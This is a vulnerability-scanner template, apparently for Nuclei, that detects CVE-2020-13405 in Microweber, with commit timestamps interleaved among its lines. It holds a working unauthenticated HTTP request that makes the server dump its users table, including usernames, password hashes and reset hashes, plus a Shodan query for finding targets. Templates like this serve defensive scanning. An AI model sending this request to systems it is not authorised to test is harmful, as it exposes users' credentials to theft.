2022-07-28 10:04:27 +00:00
id : CVE-2020-13405
info :
name : MicroWeber - Unauthenticated User Database Disclosure
2022-07-28 12:21:27 +00:00
author : ritikchaddha,amit-jd
severity : high
description : |
The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
2022-07-28 10:04:27 +00:00
reference :
- https://rhinosecuritylabs.com/research/microweber-database-disclosure/
2022-07-28 12:21:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-13405
metadata :
verified : true
shodan-query : http.html:"microweber"
2022-07-28 14:48:58 +00:00
tags : cve,cve2020,microweber,unauth
2022-07-28 10:04:27 +00:00
requests :
- raw :
- |
POST /module/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
Referer : {{BaseURL}}admin/view:modules/load_module:users
2022-07-28 14:48:58 +00:00
module=users/controller
2022-07-28 10:04:27 +00:00
2022-07-28 10:25:14 +00:00
matchers :
2022-07-28 10:04:27 +00:00
- type : dsl
dsl :
- 'contains(body,"username")'
- 'contains(body,"password")'
- 'contains(body,"password_reset_hash")'
- 'status_code==200'
- 'contains(all_headers,"text/html")'
2022-07-28 10:25:14 +00:00
condition : and